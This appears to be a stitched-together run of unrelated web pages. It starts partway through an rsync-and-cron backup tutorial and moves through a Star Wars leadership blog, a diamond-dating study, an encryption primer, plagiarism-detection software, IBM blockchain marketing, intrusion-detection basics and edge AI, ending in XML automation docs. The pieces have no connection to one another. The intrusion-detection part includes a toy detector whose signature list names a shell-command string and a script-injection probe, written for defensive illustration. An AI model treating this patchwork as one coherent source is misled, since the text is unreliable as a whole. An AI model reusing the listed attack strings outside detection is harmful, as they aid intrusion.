05 22 * * * /home/jumpcloud/backup.sh
The line stipulates that the script will run at exactly 10:05 p.m.
Save the script and exit. You should see the output indicating that a new crontab is being installed.
You can list the cron jobs using the command:
$ crontab -l
To simulate the file synchronization, we added two additional files to our data directory on the source server. When the clock ticked 10:05 p.m., the synchronization happened, as evidenced in the output when we listed the contents of the backup directory.
This time around, you can see that additional files were added to the backup directory.
We even verified that the synchronization occurred by viewing the /var/log/syslog log file.
$ cat /var/log/syslog
We have successfully enabled remote file backup using rsync. With rsync, you can back up an entire home directory or any directories of your choice to a remote server. If you are working on a system with constantly changing data, it's advisable to set the backup to run at shorter intervals, as long as this does not impede network speed or disrupt users working during business hours.
Interested in learning about other strategies you can use to ensure the security of your Linux system? Check out one of the recommended tutorials here.
The Star Wars saga has many recurring themes – the struggle between desire and destiny, good and evil, impulse and discipline. However, a theme that particularly stands out throughout the series is the examination of the relationship between student and teacher. This theme is similar to the relationship that an IT provider should strive to have with their clients.
For today’s Star Wars Day blog, we’ll review some of the lessons that a professional can learn from the Star Wars films, as well as what the insights that the relationships shared by the characters can reveal about being a mentor, as well as the mentored. To do so, we’ll examine some moments and characters from the complete series thus far – Episodes I through VIII – and the stand-alone Rogue One.
WARNING: this article may spoil a few key moments from the series, so continue at your own caution.
How to Be a Mentor, According to Star Wars
There is no shortage of those who could be considered mentors throughout the series. From Qui-Gon Jinn and Obi-Wan/Old Ben Kenobi, Luke Skywalker and Leia Organa, and finally, Yoda, many characters accept the mantle of mentor… albeit begrudgingly, at times.
In order to be a mentor, there are two requirements that each of these characters present during the series. Likewise, many characters also exhibit just one or the other characteristic. Yet, as they do not exemplify both qualities, they don’t quite qualify as a true mentor. We will explore these characters in more detail later.
These two requirements are to be a committed educator, as well as an equally committed leader. Each of the mentors listed above have had the opportunity to be both. Qui-Gon took the initiative to take a young slave into his care, campaigning to the Jedi Council for the ability to teach him. When Qui-Gon was dispatched by Darth Maul, Obi-Wan rose to the occasion and took up Anakin Skywalker as his padawan learner.
Years after Anakin succumbed to his fear and hubris to be reborn as Darth Vader, Obi-Wan continued to be a mentor under the name Ben Kenobi, teaching the Skywalker of the next generation how to embody the principles of the Jedi. Once this Skywalker, Luke, had learned to be a leader, he teamed up with his long-lost sister, Princess Leia Organa, to defeat the Empire. While Leia continued to lead an underground organization committed to fighting the Empire’s last remnants, Luke retreated to a sanctuary to ensure he was able to train the next worthy Jedi.
Finally, we would be amiss if we neglected to mention Yoda’s involvement as a leader throughout the saga. From the very beginning of the story, Yoda was a respected leader of the Jedi Order, proving his worth on the battlefield and in the Senate. When the Empire rose, he retreated to his home planet in wait of the next generation of Jedi to train. He then passed on but returned as a Force ghost to impart his wisdom again, later in the series’ timeline.
Lining Up Star Wars Mentorship with Our Own (and with The Odyssey)
As one might imagine, the concept of mentorship has been around for much longer than Star Wars has been. In fact, we get the word “mentor” from a character in Homer’s epic poem, The Odyssey. Mentor was entrusted by the protagonist, Odysseus, to care for his son in his absence, and later assisted the young prince Telemachus in reuniting with his long-lost father by serving as his guide and, well, mentor.
In this way, Mentor serves a very similar purpose as many of the characters from Star Wars. By teaching another character and acting as a leader, he allows the protagonists to succeed in their quest – or, in the terminology more likely to be used in Star Wars, their mission. Furthermore, like the mentors to be found in Star Wars, Mentor shares a few characteristics with the mentors we see in the business world.
What Makes a Mentor, a Mentor
We’ve already established that a mentor should be a sort of amalgamation of a teacher, and a leader. This is admittedly a tricky balance to find, until you describe what kind of leader and teacher makes a mentor.
First, as a leader, you have to be able to be supportive as you take charge. As you work with a mentee, commit the time that the mentee needs to grow and devote your full attention to them. Just as Ben Kenobi understood Luke's rage and bitterness after his aunt and uncle were slaughtered by the Empire's stormtroopers, you need to be able to empathize with your acolyte and guide them towards the higher purpose you can see them achieving.
As a teacher, it is important to also challenge those who you mentor. Not only should you assign tasks for your student to complete, these tasks should test the limits of their ability and set a standard that you expect them to meet. As Yoda challenged Luke to lift his X-wing fighter out of the swamps of Dagobah, he wasn’t coddling his student. Neither should you.
It is also important that, as their teacher, you review the lessons that have been imparted. These discussions will not only help ensure the information is retained, it will also encourage your mentee to draw their own conclusions. Remember, teachable moments happen all the time – it’s up to you to embrace them.
Finding Poor Examples in Rogue One
Alternatively, Rogue One offers a few examples of how very much not to be a positive leader. At the very beginning of the film, protagonist Jyn Erso's father, Galen, is pressured into returning to the Empire's service and designing the ultimate superweapon: the planet-destroying Death Star. In addition to being forced to work on a project he detests, he is stuck in a thoroughly unpleasant work environment. Oh, and did we mention that his wife was murdered and his daughter lost to him during the attack?
It should be no wonder, then, that instead of being loyal to his ‘employers,’ Galen instead decides to sabotage their operation from the inside. Hiding a critical weakness in the Death Star and sending word of it to the Rebel Alliance, Galen embodies the corporate espionage that a disgruntled employee could leverage against your business. A good leader sees the value in keeping an employee happy in two ways – first, it helps to keep that employee engaged and productive, and secondly, it reduces, if not eliminates, any ill will toward the organization.
In another example of the Empire’s failings in Rogue One, the antagonists of the film also leverage shady office politics to get a leg up on their superiors. For instance, Director Krennic elects to go over his commander’s head and out of the traditional chain of command, reporting directly to Darth Vader. As a commanding officer himself, Krennic serves as an example of what happens when office politics supersede the typical chain of command – and winds up being Force-choked into oblivion for his troubles. While it is highly unlikely that deviating from the chain of command will get you strangled like Krennic, it certainly doesn’t reflect well on you and shows a distinct lack of leadership and respect for the chain of command.
All this only goes to show that lessons in leadership can be found anywhere you look – even in a galaxy far, far away. Do you have any Jedi masters or mentors in your life? What have you learned from them? Share your thoughts in the comments and may the Force be with you!
A study of 26 diamonds formed under extreme melting conditions in the Earth's mantle shows that certain volcanic events on Earth may still be able to create super-heated conditions, previously thought to have existed only early in the planet's history, before it cooled. The findings may have implications for diamond prospecting.
Diamonds are categorized by their inclusions, minerals trapped within the carbon crystal structure that give clues about the conditions and the rocks in which they formed. The studied diamonds contain harzburgitic inclusions, a type of peridotite (the most common rock in Earth's mantle), which have experienced extreme temperatures and undergone very large amounts of melting.
The study led by researchers at the Vrije Universiteit (VU) Amsterdam used radioisotope analysis to date tiny inclusions trapped in diamonds from the Venetia mine in South Africa. Results showed that the diamonds had formed in at least two separate events. Nine of the diamonds had an age of around 3 billion years. Linked to volcanism caused by the break-up of an old continent that led to large-scale melting.
However, ten diamonds were dated as just over a billion years old, correlating with a giant volcanic event at Umkondo in southern Zimbabwe, 1.1 billion years ago.
Gareth Davies, co-author of the study, commented, “This is a fascinating insight into the inner workings of planet Earth. While young diamonds are formed in other types of rocks and conditions in the mantle, it’s very unexpected to find harzburgitic diamonds linked to relatively recent geological activity. As harzburgitic rocks are important markers for diamond prospecting, the findings may have implications for the geological environments where we look for new diamond mines.”
"Conventional thinking has been that the level of melting needed to create these diamonds could only happen early in the history of the Earth, when it was much hotter. We show that this is not the case and that some harzburgitic diamonds are much younger than assumed. We propose that our younger set of diamonds formed in a special environment: a major plume from the deep mantle rose towards the surface and underwent extensive melting as the pressure reduced," said Janne Koornneef, who led the study.
Finally, the analysis of the diamonds at VU Amsterdam was funded by the Europlanet 2020 Research Infrastructure, and the research was funded by the European Research Council. The De Beers Group of Companies donated the diamonds used in this study.
Types of Encryption for in Motion, in Use, at Rest Data
Tuesday, August 9, 2022
Encryption is the process of altering data in order to hide its content and ensure confidentiality. Entities that do not have the decryption key in their possession cannot decrypt the data and, therefore, read its content.
How does encryption work?
Plaintext data is transformed, using an encryption algorithm and a secret key, to ciphertext, which is unreadable text.
There are two types of encryption algorithms:
In symmetric algorithms, the key used to perform the encryption is the same as the one used to decrypt it and is, therefore, secret.
Examples of symmetric algorithms are:
- DES (Data Encryption Standard),
- 3DES (Triple DES),
- AES (Advanced Encryption Standard).
The latter one is, in 2022, the industry standard and is recommended to be used with 128 bits keys.
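As a concrete illustration, here is a minimal sketch of symmetric encryption with AES-GCM in Python, using the widely available third-party cryptography package (the plaintext is a placeholder and error handling is omitted):

import os
from cryptography.hazmat.primitives.ciphers.aead import AESGCM

# Generate a random 128-bit key, the recommended size noted above.
key = AESGCM.generate_key(bit_length=128)
aesgcm = AESGCM(key)

# AES-GCM needs a unique nonce for every encryption performed with the same key.
nonce = os.urandom(12)

plaintext = b"confidential payload"
ciphertext = aesgcm.encrypt(nonce, plaintext, None)  # None = no associated data

# Only a holder of the same secret key can recover the plaintext.
assert aesgcm.decrypt(nonce, ciphertext, None) == plaintext

Anyone without the key sees only the unreadable ciphertext, which is exactly the confidentiality property described above.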
Asymmetric algorithms use two different keys: a public key for encryption and a private key for decryption.
Asymmetric algorithm examples are:
- RSA (Rivest-Shamir-Adleman),
- ECC (Elliptic Curve Cryptography).
Asymmetric algorithms are not commonly used for encryption because they are slower. For example, the RSA algorithm requires keys between 1024 and 4096 bits, which slows down the encryption and decryption process.
These algorithms can be used, however, to encrypt symmetric algorithm keys when they are distributed.
A more common usage of asymmetric algorithms is digital signatures. They are mathematical algorithms that are used to cryptographically validate the authenticity and integrity of a message or media on the internet.
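A digital signature in this style can be sketched with the same Python package; the message content below is made up for the example, and verify() simply raises an exception if the message or signature has been tampered with:

from cryptography.hazmat.primitives import hashes
from cryptography.hazmat.primitives.asymmetric import rsa, padding

# The private key signs; the matching public key verifies.
private_key = rsa.generate_private_key(public_exponent=65537, key_size=2048)
public_key = private_key.public_key()

message = b"invoice #1001: pay 500 USD"
signature = private_key.sign(
    message,
    padding.PSS(mgf=padding.MGF1(hashes.SHA256()),
                salt_length=padding.PSS.MAX_LENGTH),
    hashes.SHA256(),
)

# Raises cryptography.exceptions.InvalidSignature if anything was altered.
public_key.verify(
    signature,
    message,
    padding.PSS(mgf=padding.MGF1(hashes.SHA256()),
                salt_length=padding.PSS.MAX_LENGTH),
    hashes.SHA256(),
)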
What is encryption used for?
Encryption ensures confidentiality of data. The unreadable ciphertext keeps the data private from all parties that do not possess the decryption key.
Data has three states:
- In motion,
- In use,
- At rest.
It is essential to understand these states and ensure that the data is always encrypted. It is not enough to encrypt data only when it is stored if, when in transit, a malicious party can still read it.
Therefore, we will look at encryption mechanisms for all three data states.
In Motion Encryption
Data in motion, or in transit, is data that is moved from one location to another, for example between virtual machines, containers, or networked computer systems.
Examples of data in motion include email messages, files being uploaded or downloaded, and traffic between a browser and a web server.
Data in motion can be encrypted using SSL/TLS. TLS (Transport Layer Security) and SSL (Secure Sockets Layer) are transport layer protocols that protect the data in transit. TLS is a newer and improved version of SSL.
SSL/TLS ensure confidentiality through encryption. Firstly, a session is created between the two parties exchanging a message using asymmetric encryption. Then, after the secure session is established, symmetric algorithms are used to encrypt the data in motion.
Using one of the mentioned protocols prevents attackers from reading the data in motion.
Websites should use HTTPS (Hypertext Transfer Protocol Secure) instead of HTTP to ensure encryption between websites and browsers. HTTPS uses SSL/TLS.
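As a small demonstration of TLS from the client side, the Python sketch below opens a TLS-protected connection and prints the negotiated protocol version and cipher suite (example.com and port 443 are placeholder values):

import socket
import ssl

context = ssl.create_default_context()  # verifies the server certificate by default

with socket.create_connection(("example.com", 443)) as sock:
    with context.wrap_socket(sock, server_hostname="example.com") as tls:
        print(tls.version())  # e.g., 'TLSv1.3'
        print(tls.cipher())   # the negotiated cipher suite

Everything written to the wrapped socket after the handshake is encrypted in transit, which is what defeats the eavesdropping attacks described next.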
What is in motion data vulnerable to?
Eavesdropping attacks. In this situation, malicious entities can analyze traffic sent over the internet and read unencrypted data.
In Use Encryption
Data currently accessed and used is considered in use.
Examples of in use data are:
- files that are currently open,
- RAM data.
Because data needs to be decrypted to become in use, it is essential that data security is taken care of before the actual use of data begins.
To do this, you need to ensure a good authentication mechanism. Technologies like Single Sign-On (SSO) and Multi-Factor Authentication (MFA) can be implemented to increase security.
Moreover, after a user authenticates, access management is necessary. Users should not be allowed to access any available resources, only the ones they need to, in order to perform their job.
A method of encryption for data in use is Secure Encrypted Virtualization (SEV). It requires specialized hardware, and it encrypts RAM memory using an AES-128 encryption engine and an AMD EPYC processor. Other hardware vendors are also offering memory encryption for data in use, but this area is still relatively new.
What is in use data vulnerable to?
In use data is vulnerable to authentication attacks. These types of attacks are used to gain access to the data by bypassing authentication, brute-forcing or obtaining credentials, and others.
Another type of attack for data in use is a cold boot attack. Even though the RAM memory is considered volatile, after a computer is turned off, it takes a few minutes for that memory to be erased. If kept at low temperatures, RAM memory can be extracted, and, therefore, the last data loaded in the RAM memory can be read.
At Rest Encryption
Once data arrives at the destination and is not used, it becomes at rest.
Examples of data at rest are:
- cloud storage assets such as buckets,
- files and file archives,
- USB drives, and others.
This data state is usually most targeted by attackers who attempt to read databases, steal files stored on the computer, obtain USB drives, and others.
Encryption of data at rest is fairly simple and is usually done using symmetric algorithms. When you perform at rest data encryption, you need to ensure you’re following these best practices:
- you're using an industry-standard algorithm such as AES,
- you’re using the recommended key size,
- you’re managing your cryptographic keys properly by not storing your key in the same place and changing it regularly,
- the key-generating algorithms used to obtain the new key each time are random enough.
For the examples of data given above, you can have the following encryption schemes:
- full disk encryption,
- database encryption,
- file system encryption,
- cloud assets encryption.
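Tying the best practices above together, here is a minimal sketch of file encryption at rest using the Fernet recipe (AES-128 in CBC mode with an HMAC) from Python's cryptography package. The file name is illustrative, and in production the key would live in an HSM or a cloud key management service rather than next to the data, as discussed below:

from cryptography.fernet import Fernet

# The key must be stored separately from the encrypted data.
key = Fernet.generate_key()
f = Fernet(key)

with open("report.csv", "rb") as fh:
    token = f.encrypt(fh.read())  # returns an authenticated ciphertext "token"

with open("report.csv.enc", "wb") as fh:
    fh.write(token)

# Decryption requires the same key; a wrong key raises InvalidToken.
with open("report.csv.enc", "rb") as fh:
    restored = Fernet(key).decrypt(fh.read())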
One important aspect of encryption is cryptographic keys management. You must store your keys safely to ensure confidentiality of your data.
You can store keys in Hardware Security Modules (HSM), which are dedicated hardware devices for key management. They are hardened against malware or other types of attacks.
Another secure solution is storing keys in the cloud, using services such as:
- Azure Key Vault,
- AWS Key Management Service (AWS KMS),
- Cloud Key Management Service in GCP.
What is at rest data vulnerable to?
Although data at rest is the easiest to secure out of all three states, it is usually the point of focus for attackers. There are a few types of attacks data at rest is vulnerable to:
- Exfiltration attacks. The most common way at rest data is compromised is through exfiltration attacks, which means that hackers try to steal that data. For this reason, implementing a very robust encryption scheme is important.
Another essential thing to note is that, when data is exfiltrated, even if it is encrypted, attackers can try to brute-force the cryptographic keys offline for a long period of time. Therefore, a long, random encryption key should be used (and rotated regularly).
- Hardware attacks. If a person loses their laptop, phone, or USB drive and the data stored on them is not encrypted (and the devices are not protected by passwords or have weak passwords), the individual who found the device can read its contents.
Are you protecting data in all states?
Use Cyscale to ensure that you’re protecting data by taking advantage of over 400 controls.
Here are just a few examples of controls that ensure data security through encryption across different cloud vendors:
- Ensure all S3 buckets employ encryption-at-rest for AWS
- Ensure web app is using the latest version of TLS encryption for Azure
- Ensure VM disks for critical VMs are encrypted with Customer-Supplied Encryption Keys (CSEK) for GCP
- Ensure server-side encryption is set to 'Encrypt with Service Key' for Alibaba
Plagiarism is nothing new for educators. For as long as there have been essays, there have been students looking to cheat their way out of having to write them. In the past, that typically meant copying information out of encyclopedias and other reference materials. With the massive number of media outlets and online sources available to them, today's students have more opportunities than ever before to plagiarize. As the internet has grown, universities have seen more instances of plagiarism. In fact, 55 percent of college presidents have said the number of plagiarized essays on their campuses has increased over the last decade. Eighty-nine percent said personal computers and the internet have played a major role in the trend.
With more universities using online course resources, it can be difficult for professors to be sure that the papers their students are writing are original. Many have been forced to take it upon themselves to scour the internet searching for proof to find out whether suspicious papers have indeed been plagiarized. Needless to say, that is an arduous process, with teachers entering passages into search engines and waiting to see if anything turns up.
Keeping students honest in the classroom
In the classroom, one way for teachers to prevent students from copying others’ work is with computer monitoring software, which allows instructors to view student monitors and track their web browsing in real-time. If a student begins copying and pasting passages from an online resource, the professor will know right away.
Out of class, things can get a bit trickier. Students are free to access whatever sites they please without being monitored. There is little professors can do at this point to prevent plagiarism, but there are tools available to help them identify plagiarized essays.
Brevard Community College in Cocoa, Florida, has begun using software that analyzes electronically-submitted essays. By comparing the content of a student’s paper against its text database, the program can determine how much of the material was copied.
At first, schools that implemented the software found that instances of plagiarism actually increased on campus, because teachers were better able to identify stolen material. Once the program’s existence became common knowledge, plagiarism rates plummeted. In addition to keeping students honest, the software has freed up time for instructors as they no longer have to go to great lengths to identify plagiarism. With these software tools at their disposal, college professors can be sure that their students are producing original work.
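Vendors do not publish their exact matching algorithms, but the core idea of comparing a submission against a database of known texts can be illustrated with a toy word n-gram overlap check in Python (the corpus and essay below are placeholders):

def ngrams(text, n=5):
    # Break the text into overlapping runs of n consecutive words.
    words = text.lower().split()
    return {" ".join(words[i:i + n]) for i in range(len(words) - n + 1)}

def overlap_score(submission, source, n=5):
    # Fraction of the submission's n-grams that also appear in the source.
    sub = ngrams(submission, n)
    return len(sub & ngrams(source, n)) / len(sub) if sub else 0.0

corpus = {"encyclopedia_entry": "...", "reference_site": "..."}  # placeholder texts
essay = "..."  # the submitted paper

for name, source in corpus.items():
    print(name, round(overlap_score(essay, source), 2))

A high overlap score does not prove plagiarism on its own, which is why real tools report matched passages for an instructor to review.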
Do you think enough is being done to prevent plagiarism? Would you like to see more universities install anti-plagiarism software? Tell us what you think in the comments section below or message us directly on Facebook!
Let’s be honest with each other. How many of you still believe that blockchain technology is Bitcoin? Or that it’s only applicable for cryptocurrency? Well, blockchain has become so much more. The most popular misconception is that Bitcoin equals blockchain. When Bitcoin was the only blockchain, there wasn’t much distinction between the terms. As the technology matured, use cases quickly diverged beyond the pure monetary aspect. Another myth is that blockchain is only relevant to the FinTech industry. Blockchain technology can be applied and has been applied to many different industries.
Interestingly, there are still several misconceptions floating around about blockchain. Perhaps this is not too surprising since it’s still considered a relatively new technology. While the concept for blockchain was born nearly 30 years ago by cryptographers Stuart Haber and W. Scott Stornetta, The Linux Foundation’s Hyperledger Project in 2016 really set the wheels in motion for the beginning of enterprise blockchain.
Leverage the IBM Blockchain Ecosystem for new opportunities
By establishing the umbrella project of open source blockchains and tools, innovators began creating open, standardized and enterprise-grade distributed ledger blockchain frameworks and code bases to produce tangible business results across multiple industries: in finance, banking, healthcare, IoT, supply chain, manufacturing and other industries.
Put your fears aside
“The only way to lead in today’s ever-changing marketplace, is to constantly innovate according to what our clients want and need.” – Arvind Krishna, IBM CEO
When the internet was invented, it was revolutionary in the way it changed how people, businesses and governments operate. Blockchain is doing for business what the internet did for communication. Whenever new technologies get introduced, people rightfully have many questions, plenty of curiosity, and sometimes misconceptions about what is real, and what is possible. Blockchain is undoubtedly a subject of much conversation as with other emerging technologies.
The advancement of technology generally evokes a range of emotions in people, particularly trepidation. However, to stay on the cutting edge, it is a good time for companies to assess where they are, set new goals, change old habits and try new things. It is essential to stay relevant and current.
Ginni Rometty, IBM Executive Chairman has always said, “Growth and comfort do not coexist.” If you don’t get out of your comfort zone, and if you aren’t learning and taking risks, you won’t grow. You’ll stay right where you are. You need to adapt, you need to change, you need to keep learning.
This is where Business Partners come in
I’ve been working with Business Partners, a variety of solution providers, for over 20 years. As trusted advisors, your clients count on you to help them navigate new waters. They view you as vendor-agnostic, ready to bring forward the best technology solutions to keep their companies efficient and profitable.
While many technology solution providers (TSPs) aim to be early adopters, there are many of you who have expressed to me that blockchain seems to be just too hard. I’ve heard questions and perceptions such as these:
Do you need an advanced degree to work with blockchain?
False. An advanced degree in cryptography is not necessary to build on or use blockchain technology. Many tools exist to assist in leveraging the technology, and several blockchains allow you to develop applications in almost any coding language.
Isn’t blockchain really just a database?
Every blockchain may be considered a database, but not every database can be considered a blockchain. Blockchain is like a database because it is a digital ledger that stores information in data structures called blocks. A conventional database can be modified by a single user, but a blockchain is a shared ledger that is immutable for all participants in a transaction. Each block of information contains a hash code to provide cryptographic security.
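The "blocks linked by hash codes" idea can be sketched in a few lines of Python; a real blockchain adds consensus, digital signatures, and peer-to-peer networking on top of this basic structure:

import hashlib
import json

def make_block(data, prev_hash):
    # Each block stores its data plus the hash of the previous block.
    block = {"data": data, "prev_hash": prev_hash}
    serialized = json.dumps(block, sort_keys=True).encode()
    block["hash"] = hashlib.sha256(serialized).hexdigest()
    return block

genesis = make_block("genesis", "0" * 64)
block1 = make_block("Alice pays Bob 5", genesis["hash"])

# Tampering with an earlier block breaks the hash link to every later block.
genesis["data"] = "genesis (edited)"
recomputed = hashlib.sha256(json.dumps(
    {"data": genesis["data"], "prev_hash": genesis["prev_hash"]},
    sort_keys=True).encode()).hexdigest()
print(recomputed == block1["prev_hash"])  # False: the edit is detectable

This chaining is what makes the shared ledger effectively immutable: changing any historical record invalidates every block that follows it.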
Different ways to engage and accelerate your business
It is vital to ensure you are educated on the different ways you can work with blockchain. Business Partners can:
- Build your own branded blockchain solution on IBM Blockchain Platform
- Build a network for your clients
- Establish your blockchain solution with either a software or SaaS implementation
- Drive a client to an existing network
These options and sample use cases can be found on our ecosystem page for Blockchain Partners.
Join us for a helpful webinar
Join us for our Blockchain Mythbusters webinar. Let us de-bunk the myths and clear the air on what is myth versus fact, what blockchain can or cannot do, and provide you with information on how you and your clients can reap the benefits and efficiencies that an IBM Blockchain solution provides.
Learn about the anatomy of a blockchain solution and the different ways you can leverage your existing skills. For our Business Partners out there, we want to help you get started, and we look forward to working with you.
Hear Blockchain Mythbusters and discover new opportunities with blockchain
Sustainable Tech: 5 IT Giants Lowering Their Carbon Footprint
From slashing carbon emissions to renewable energy investments and responsible water usage, here’s what five IT leaders are doing right now to combat climate change.
AT&T Intros Initiative To Reduce U.S Carbon Emissions
Telecom giant AT&T in August launched its Connected Climate initiative aimed at reducing carbon emissions in partnership with energy companies, fellow tech companies, and researchers.
The goal is for AT&T to help businesses reduce greenhouse emissions by 1 billion metric tons — 1 gigaton — by 2035. A gigaton is equal to approximately 15 percent of U.S. greenhouse gas emissions and nearly 3 percent of global energy-related emissions generated in 2020, according to the Dallas-based telecom. The initiative will push enterprise IT teams to rely more on renewable energy sources, especially as more companies move applications into the cloud.
Companies that have signed on to AT&T’s Connected Climate pledge include Microsoft, Equinix, Duke Energy, Texas A&M University System, and The University of Missouri.
July 25, 2019
What Is an Intrusion Detection System?
An intrusion is any activity that is designed to compromise your data security. This can be through more menacing and pervasive formats like ransomware or unintentional data breaches by employees or others connected to your network.
An intrusion may include any of the following:
- Malware or ransomware
- Attempts to gain unauthorized access to a system
- DDOS attacks
- Cyber-enabled equipment destruction
- Accidental employee security breaches (like moving a secure file into a shared folder)
- Untrustworthy users –– both team members and those outside of your organization
- Social engineering attacks –– such as phishing campaigns and other ways of tricking users with seemingly legitimate communication
There are hundreds of ways that your MSP clients can experience data insecurity through an intrusion. There are much fewer methods for ensuring data safety with confidence and dependability. One trusted data security solution for MSPs is using an intrusion detection system.
What is an intrusion detection system?
Imagine you’re a security expert tasked with monitoring public safety for a metropolitan city’s large event. You can accomplish this in several different ways. You would likely have an aerial view and officers scattered throughout the event, scanning nearby groups, and assessing each person’s level of threat from close up. You would be wise to hire security experts who know what to look for based on their experience with known attackers who can flag behavior others may not notice.
This is, essentially, what your intrusion detection system (IDS) does day after day with your data packets, monitoring traffic to keep your network safe and secure from threats.
These are the three main types of intrusion detection systems:
- A network intrusion detection system (NIDS) is a security expert who has seen it all. It monitors traffic across an entire subnet, compares it to known attacks, and flags any suspicious traffic.
- A network node intrusion detection system (NNIDS) works similarly to the NIDS, except on a micro level. It checks each node connected to the network for threats and malicious activity. NNIDS is the security guard checking bags of each person walking into the event.
- A host intrusion detection system (HIDS) is the eye in the sky, checking on the whole event. A HIDS examines all of the system’s nodes and hosts to gather a more complete picture and then runs security checks for malicious activity based on that entire picture. Some security experts suggest that this type of IDS is the most effective as it can detect threats that originate within the network as well as external threats.
These are the types of intrusion detection system that MSPs can expect their clients to ask about, or at least that MSPs should know at a cursory level. Clients may not understand how a firewall works alongside an intrusion detection system. Learn why they need both.
Firewall security versus intrusion detection techniques
Your MSP clients need a firewall, a barricade keeping blatant malicious activity from entering your network. Of course, network attacks are becoming more sophisticated and occasionally occur from within your network, and that requires a higher level of scrutiny for each data packet traversing your network. Within intrusion detection systems there are two intrusion detection techniques: either noting suspicious activity or requiring strict security clearance for network entrance.
Here are the two intrusion detection techniques explained:
- Signature-based intrusion detection: As long as your network has a reliable database of stored signatures, checking packets against signatures (known identity) will keep your network safe. On the downside, signature-based IDS will cost your clients in CPU when using advanced signatures, which are better because they’re harder to falsify.
- Anomaly-based intrusion detection: One of the most important benefits of an anomaly-based IDS is its ability to detect the precursors to attacks: sweeps and probes toward network hardware. It also looks for anything out of the ordinary, within the network and from outside of it. The cons of an anomaly-based IDS are the cost of setup and requirement of connection to a security operation center. Because it is more comprehensive, it requires a bit more involvement. It is also arguably more effective than a signature-based IDS.
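As a rough illustration of the two techniques, the Python sketch below flags traffic both ways: an exact match against a toy database of known bad signatures, and a statistical check for request rates far outside a learned baseline (the signatures, baseline, and threshold are invented for the example):

import statistics

KNOWN_BAD = ("cmd.exe /c", "<script>alert(")  # toy signature database

def signature_alert(payload):
    # Signature-based: flag payloads containing any known attack pattern.
    return any(sig in payload for sig in KNOWN_BAD)

def anomaly_alert(requests_per_min, baseline, threshold=3.0):
    # Anomaly-based: flag rates more than `threshold` std devs above the mean.
    mean = statistics.mean(baseline)
    stdev = statistics.pstdev(baseline) or 1.0
    return (requests_per_min - mean) / stdev > threshold

baseline = [40, 52, 47, 44, 50, 49, 45]      # normal requests per minute
print(signature_alert("GET /index.html"))     # False
print(signature_alert("cmd.exe /c whoami"))   # True: signature match
print(anomaly_alert(400, baseline))           # True: rate anomaly

The signature check is cheap but only catches what it already knows; the anomaly check can surface novel behavior but needs a trustworthy baseline, which mirrors the trade-off described above.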
Intrusion detection vs. intrusion prevention
An IDS is the first line of defense –– detecting threats. Now, it’s time to bring in the S.W.A.T. team and neutralize the threat. Intrusion prevention systems are typically paired with an intrusion detection system to create the ultimate tool in threat detection and prevention. An intrusion detection and prevention system, like the one in the Datto Networking Appliance (DNA), detects threats and uses deep packet inspection features to detect and prevent intrusions in your and your clients’ networks.
With growing threats and more entry points than ever, your MSP’s network security features need to be robust and proactive.
Learn how to bolster your MSP’s network security offering with Datto’s MSP security toolkit, Ransomware Made MSPeasy.
Even though edge computing is being talked almost hand in hand with edge AI, what is behind the term and what role does edge AI play in this broader edge computing ecosystem?
Edge AI refers to the deployment of AI applications in or near the smart or constrained device edge, terms which both describe where computing is done and the characteristics of the devices. As with edge computing, edge AI brings computation closer to the source where data is generated. Organizations exploring business opportunities by employing AI-based projects, edge AI improves the processes, efficiency and security for the data.
Among the many uses of edge AI, performing computer vision (including facial recognition) at the edge can enable workers to access machine functions that they are trained for, as well as aiding in workplace safety.
Technological breakthroughs in deploying AI models at the edge have brought in innovative strategies for designing power-efficient AI models that can be scaled in IoT edge devices. Traditionally, machine learning models were trained before the deployment of the neural networks in edge devices. However, with new edge AI models coming to light, developers can use efficient models that can re-train themselves while processing the new incoming data — making them more intelligent than ever before.
There is an emerging trend for federated learning and training machine learning models at the edge to maintain data privacy and security. Deploying AI at the edge offers benefits to users as well as developers by offering a different model for security and privacy. Processing the incoming sensor data on or close to the data source (for example, in facial recognition, where the face is the 'data') means personally identifiable information is analyzed locally rather than being sent across the internet to a central cloud. The reduced cost of sending data and lower latency for processing are added bonuses.
Another emerging trend at the constrained device edge is deploying ML inference models in microcontroller-based resources like the smart speakers (Alexa). For uses where there is more power available, AI-specific chips are being used. For example, for autonomous vehicles to do object detection, AI accelerators can be integrated inside edge devices that are responsible for AI inference. In some cases where the deployed AI models encounter errors or anomalies in the data, the data can be transferred to the cloud facility for training on the original AI model. This feedback mechanism makes edge AI smarter and faster than traditional AI applications.
Some of the common examples where edge AI has become an essential technology and backbone for industries include manufacturing, healthcare, financial services, transportation, and many more.
Use the XML command to process XML information that is generated from web services and cloud computing applications.
The XML command supports sessions, node editing, and Xpath expression execution, based on a tree structure of an XML document. The command enables the automated TaskBot / MetaBot Logic to navigate the tree and make selections based on various criteria.
The XML command enables users to capture data that has XML formatting and save it to a specified location.
To learn more, search for the Automating Structured Data: How to Work with XML Streams and Automating Tasks Using the XML Command courses in Automation Anywhere University: RPA Training and Certification (A-People login required).
- Start XML Session
- Specifies the session name and data source (a file or text).
- End XML Session
- Complements the Start XML Session operation by closing an open XML session.
- Insert Node
- Specifies node name and value. The location of the node is based on the position of the XPath Expression.
- Specifies action if node name is present (Insert It Anyways, Skip It, or Overwrite It) and where to insert the node (Beginning, End, Before Specific child node, or After Specific child node).
Note: If Before Specific child node or After Specific child node is selected, specify child node name.
- In the XML command, when you insert a node into the XML file, DefaultNSPrefix is no longer added. In the Advanced view tab of the Insert Node command, xmlns (default XML namespace) is not allowed either as a prefix or as an attribute. You can enable the DefaultNSPrefix manually by setting the value of allowaddingdefaultnamespace to true in the AA.settings file.
Note: If DefaultNSPrefix is enabled and the value of allowaddingdefaultnamespace is set to true, you might encounter an issue: when you insert or update a new node as an empty node, a newline character is added and indentation is not maintained.
- Delete Node/Attribute
- Deletes a node or attribute from the XML file by specifying the XPath Expression.
- Update Nodes
- Updates nodes in a session at the position that is specified for the XPath Expression.
- Update Attributes: Mark the check box to add, update, or delete attributes.
- Validate XML Document
Validates session data using XML schema files (.xsd), internal Document Type Definitions (DTDs), or if the session data is Well Formed.
Validation output (VALID or INVALID) can be assigned to a variable. If an error occurs during validation, it is stored in the system variables named: $Error Line Number$ and $Error Description$.
- Get Node(s)
- Retrieves the value(s) of a single or multiple node(s) in the session data by
specifying the XPath Expression.
- Get Single Node: Retrieves the value of a single node or attribute from the session data, at the position specified in the XPath expression. The value is assigned to a variable.
- Get Multiple Nodes: Retrieves values from multiple nodes in the session data, using Text value/XPath expression/Specified attribute name, based on the specified XPath expression.
- The value is assigned to a system variable named $XML Data Node (Node name)$, which can be used in conjunction with a LOOP command. For example, a Loop command can be used to search each node in an XML data set.
- Save Session Data
